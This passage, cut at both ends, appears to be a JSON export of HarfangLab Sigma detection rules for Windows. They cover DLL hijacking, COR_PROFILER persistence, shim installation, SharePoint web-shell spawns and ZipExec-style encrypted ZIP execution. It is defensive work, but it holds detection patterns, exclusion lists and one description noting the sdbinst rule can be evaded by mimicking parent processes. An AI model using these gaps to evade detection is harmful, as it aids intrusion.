"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081102Z",
"creation_date": "2026-03-23T11:45:34.081104Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hvix64.yml",
"content": "title: DLL Hijacking via hvix64.exe\nid: dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5\ndescription: |\n Detects potential Windows DLL Hijacking via hvix64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvix64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\KDSTUB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd90eaf0-3a7a-41c3-8629-fb73d3ec4ec5",
"rule_name": "DLL Hijacking via hvix64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvix64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dd94655a-da1f-45df-a62f-a450279586eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589437Z",
"creation_date": "2026-03-23T11:45:34.589440Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589448Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hostname.yml",
"content": "title: DLL Hijacking via Hostname\nid: dd94655a-da1f-45df-a62f-a450279586eb\ndescription: |\n Detects potential Windows DLL Hijacking via hostname.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hostname.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mswsock.dll'\n - '\\napinsp.dll'\n - '\\nlansp_c.dll'\n - '\\pnrpnsp.dll'\n - '\\winrnr.dll'\n - '\\wshbth.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dd94655a-da1f-45df-a62f-a450279586eb",
"rule_name": "DLL Hijacking via Hostname",
"rule_description": "Detects potential Windows DLL Hijacking via hostname.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dda6c94b-47f4-42fd-bdbd-76095c15ac79",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086046Z",
"creation_date": "2026-03-23T11:45:34.086048Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086052Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://offsec.almond.consulting/UAC-bypass-dotnet.html",
"https://redcanary.com/blog/cor_profiler-for-persistence/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-2---system-scope-cor_profiler",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_clr_profiler_system_environment_variable_modification.yml",
"content": "title: .NET CLR Profiler Changed in System Environment\nid: dda6c94b-47f4-42fd-bdbd-76095c15ac79\ndescription: |\n Detects when a COR_PROFILER or a COR_PROFILER_PATH process environment variable is being modified.\n An adversary could set the COR_PROFILER environment variable to a malicious payload to achieve persistence or privilege escalation.\n It is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\nreferences:\n - https://offsec.almond.consulting/UAC-bypass-dotnet.html\n - https://redcanary.com/blog/cor_profiler-for-persistence/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md#atomic-test-2---system-scope-cor_profiler\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2022/12/23\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\\\*\\Environment\\COR_PROFILER'\n - 'HKLM\\\\*\\Environment\\COR_PROFILER_PATH'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n - 'HKLM\\\\*\\Environment\\COR_PROFILER'\n - 'HKLM\\\\*\\Environment\\COR_PROFILER_PATH'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_cybereason:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n - 'Cybereason, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 
'Microsoft Windows'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dda6c94b-47f4-42fd-bdbd-76095c15ac79",
"rule_name": ".NET CLR Profiler Changed in System Environment",
"rule_description": "Detects when a COR_PROFILER or a COR_PROFILER_PATH process environment variable is being modified.\nAn adversary could set the COR_PROFILER environment variable to a malicious payload to achieve persistence or privilege escalation.\nIt is recommended to investigate the value of the registry modification as well as the process performing the modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ddfacdc8-9d69-4697-bdc8-98e179789464",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088418Z",
"creation_date": "2026-03-23T11:45:34.088420Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088424Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_execution_from_user_public.yml",
"content": "title: Suspicious Process Executed from Public User Folder\nid: ddfacdc8-9d69-4697-bdc8-98e179789464\ndescription: |\n Detects a suspicious execution from the root of the Public user folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to investigate the parent and child processes for suspicious activities.\nreferences:\n - https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf\n - https://attack.mitre.org/techniques/T1036/\ndate: 2022/12/14\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '?:\\Users\\Public\\\\*.exe'\n\n filter_depth:\n Image: '?:\\Users\\Public\\\\*\\\\*.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ddfacdc8-9d69-4697-bdc8-98e179789464",
"rule_name": "Suspicious Process Executed from Public User Folder",
"rule_description": "Detects a suspicious execution from the root of the Public user folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to investigate the parent and child processes for suspicious activities.\n",
"rule_creation_date": "2022-12-14",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "de57a975-1542-4602-bd7b-633e461ec1a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075270Z",
"creation_date": "2026-03-23T11:45:34.075272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html",
"https://redcanary.com/blog/detecting-application-shimming/",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
"https://blog.f-secure.com/hunting-for-application-shim-databases/",
"https://attack.mitre.org/techniques/T1546/011/"
],
"name": "t1546_011_sdbinst.yml",
"content": "title: Sdbinst.exe Executed\nid: de57a975-1542-4602-bd7b-633e461ec1a1\ndescription: |\n Detects an execution of the legitimate windows binary sdbinst.exe, used to install a new shim database on the system.\n Application shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\n This feature is often used by attackers in order to establish persistence or to elevate privileges by executing malicious content triggered by application shims.\n It is recommended to investigate the newly installed shim and to look for other suspicious activities by the parent processes.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html\n - https://redcanary.com/blog/detecting-application-shimming/\n - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n - https://blog.f-secure.com/hunting-for-application-shim-databases/\n - https://attack.mitre.org/techniques/T1546/011/\ndate: 2021/08/27\nmodified: 2025/04/04\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\sdbinst.exe'\n - OriginalFileName: 'sdbinst.exe'\n selection_command:\n CommandLine|contains: '.sdb'\n\n selection_parent:\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem 
by requiring the ParentImage fields to contain a `\\`.\n ProcessParentImage|contains: '\\'\n\n exclusion_trustedinstaller:\n CommandLine:\n - '?:\\windows\\System32\\sdbinst.exe /c'\n - '?:\\windows\\SysWOW64\\sdbinst.exe /c'\n ParentImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_programfiles:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\Windows\\System32\\sdbinst.exe *:\\Program Files\\'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe *:\\Program Files\\'\n\n exclusion_dbtask:\n CommandLine:\n - '?:\\WINDOWS\\System32\\sdbinst.exe -m -bg'\n - '?:\\WINDOWS\\System32\\sdbinst.exe -mm'\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\PcaSvc.dll,PcaPatchSdbTask'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p'\n - '?:\\Windows\\System32\\sdbinst.exe -m -bg'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -mm'\n\n exclusion_ztvoice:\n CommandLine:\n - '?:\\windows\\system32\\sdbinst.exe -q ?:\\windows\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n ParentImage|endswith: '\\msiexec.exe'\n\n exclusion_immersivecontrolpanel:\n CommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -u ?:\\WINDOWS\\AppPatch\\CustomSDB\\{????????-????-????-????-????????????}.sdb'\n ParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n exclusion_acmigration:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q ?:\\WINDOWS\\Panther\\MigrationShims\\MigShim?\\Migrating\\{????????-????-????-????-????????????}.sdb'\n - '?:\\WINDOWS\\system32\\sdbinst.exe -q -u -g 
{????????-????-????-????-????????????}'\n ParentCommandLine: 'rundll32.exe acmigration.dll,ApplyMigrationShims'\n\n exclusion_msiexec:\n ParentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n GrandparentImage: '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_appwiz:\n CommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -u ?:\\WINDOWS\\AppPatch\\CustomSDB\\{????????-????-????-????-????????????}.sdb'\n ParentCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}'\n\n exclusion_ztvoiceenable:\n CommandLine:\n - '?:\\Windows\\system32\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\ZtVoicesEnable_*.sdb'\n - '?:\\Windows\\SysWOW64\\sdbinst.exe -q -u ?:\\WINDOWS\\Speech\\ZtVoicesEnable_*.sdb'\n\n exclusion_compatibility_toolkit:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\Assessment and Deployment Kit\\Application Compatibility Toolkit\\Compatibility Administrator (64-bit)\\Compatadmin.exe'\n\n exclusion_compatibility_assistant:\n ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc'\n\n exclusion_testxpert:\n # Generic InstallShield\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*\\setup.tmp'\n ProcessParentProduct: 'testXpert III'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "de57a975-1542-4602-bd7b-633e461ec1a1",
"rule_name": "Sdbinst.exe Executed",
"rule_description": "Detects an execution of the legitimate Windows binary sdbinst.exe, used to install a new shim database (.sdb) on the system.\nApplication shims are used by Microsoft to allow backward compatibility of applications across differing Windows versions.\nThis feature is often used by attackers to establish persistence or to elevate privileges by executing malicious content triggered by application shims.\nIt is recommended to investigate the newly installed shim and to look for other suspicious activities by the parent processes.\nNote that events whose parent process information is missing are deliberately ignored to limit noise, and that most exclusions are keyed on parent image paths, parent command lines or product metadata rather than on code signatures, so an attacker able to mimic one of those parents may not trigger the rule.\n",
"rule_creation_date": "2021-08-27",
"rule_modified_date": "2025-04-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "de5faf6e-5ae5-4a39-919d-4118f7c7bc95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086668Z",
"creation_date": "2026-03-23T11:45:34.086670Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086674Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-detection/detecting-sharepoint-attacks-via-worker-process-activity/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_webshell_sharepoint.yml",
"content": "title: Suspicious Process Spawned by Microsoft Sharepoint Web Server\nid: de5faf6e-5ae5-4a39-919d-4118f7c7bc95\ndescription: |\n Detects a suspicious process being spawned by a Microsoft Sharepoint Web Server.\n Attackers may abuse vulnerabilities present in MS Sharepoint to execute malicious code.\n It is recommended to analyze this process' command-line to determine its legitimacy in the context of the web application.\nreferences:\n - https://redcanary.com/blog/threat-detection/detecting-sharepoint-attacks-via-worker-process-activity/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/02/18\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n\n filter_w3wp:\n ProcessImage: '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n\n filter_wer:\n ProcessImage:\n - '?:\\Windows\\system32\\wermgr.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n\n filter_dotnet_compiler:\n ProcessImage:\n - '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\csc.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\vbc.exe'\n\n filter_regiis:\n ProcessImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\*\\aspnet_regiis.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "de5faf6e-5ae5-4a39-919d-4118f7c7bc95",
"rule_name": "Suspicious Process Spawned by Microsoft Sharepoint Web Server",
"rule_description": "Detects a suspicious process being spawned by a Microsoft SharePoint web server (an IIS w3wp.exe worker process whose command line references SharePoint).\nAttackers may abuse vulnerabilities present in Microsoft SharePoint, or a web shell deployed on the server, to execute malicious code.\nIt is recommended to analyze this process' command line to determine its legitimacy in the context of the web application.\n",
"rule_creation_date": "2025-02-18",
"rule_modified_date": "2025-03-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "deb633a1-236a-4d87-a05c-90300c190b66",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070806Z",
"creation_date": "2026-03-23T11:45:34.070808Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070812Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Tylous/ZipExec",
"https://attack.mitre.org/techniques/T1027/009/"
],
"name": "t1027_009_suspicious_process_decompressing_encrypted_zip.yml",
"content": "title: Encrypted ZIP File Suspiciously Decompressed\nid: deb633a1-236a-4d87-a05c-90300c190b66\ndescription: |\n Detects cmdkey.exe storing a credential for an encrypted ZIP file (target Microsoft_Windows_Shell_ZipFolder:filename=...), which lets the Windows Explorer ZIP folder handler open the archive without prompting for its password.\n Attackers can use this technique to execute a malicious payload and evade detection using encryption.\n This technique is used in the ZipExec tool, which provides a simple way to craft these payloads.\n It is recommended to investigate the content of the ZIP archive and the process that downloaded it.\nreferences:\n - https://github.com/Tylous/ZipExec\n - https://attack.mitre.org/techniques/T1027/009/\ndate: 2022/12/15\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.009\n - attack.execution\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'cmdkey.exe'\n CommandLine|contains|all:\n - 'Microsoft_Windows_Shell_ZipFolder'\n - 'filename='\n - '?pass:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "deb633a1-236a-4d87-a05c-90300c190b66",
"rule_name": "Encrypted ZIP File Suspiciously Decompressed",
"rule_description": "Detects cmdkey.exe storing a credential for an encrypted ZIP file (target Microsoft_Windows_Shell_ZipFolder:filename=...), which lets the Windows Explorer ZIP folder handler open the archive without prompting for its password.\nAttackers can use this technique to execute a malicious payload and evade detection using encryption.\nThis technique is used in the ZipExec tool, which provides a simple way to craft these payloads.\nIt is recommended to investigate the content of the ZIP archive and the process that downloaded it.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
